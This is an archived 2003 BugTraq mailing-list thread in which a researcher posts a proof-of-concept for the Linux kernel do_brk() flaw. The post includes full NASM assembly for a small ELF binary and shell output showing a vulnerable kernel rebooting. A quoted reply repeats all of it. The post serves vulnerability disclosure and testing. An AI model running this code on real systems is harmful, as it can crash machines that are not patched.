BugTraq
Back to list
|
Post reply
Linux kernel do_brk() proof-of-concept exploit code
Dec 02 2003 03:16AM
Christophe Devine (DEVINE iie cnam fr)
(1 replies)
The following program can be used to test if a x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.
$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out
$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0
(system reboots when the program exits)
$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
(the program exits gracefully)
$ cat brk_poc.asm
; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
BITS 32
org 0xBFFFF000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd 0x4000 ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
mov eax, 162
mov ebx, timespec
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
timespec dd 20,0
filesize equ $ - $$
--
Christophe Devine - http://www.cr0.net:8040/about/
[ reply ]
Re: Linux kernel do_brk() proof-of-concept exploit code
Dec 02 2003 05:21PM
Calum (bugtraq umtstrial co uk)
Privacy Statement
Copyright 2010, SecurityFocus
The following program can be used to test if a x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.
$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out
$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0
(system reboots when the program exits)
$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
(the program exits gracefully)
$ cat brk_poc.asm
; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
BITS 32
org 0xBFFFF000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd 0x4000 ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
mov eax, 162
mov ebx, timespec
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
timespec dd 20,0
filesize equ $ - $$
--
Christophe Devine - http://www.cr0.net:8040/about/
[ reply ]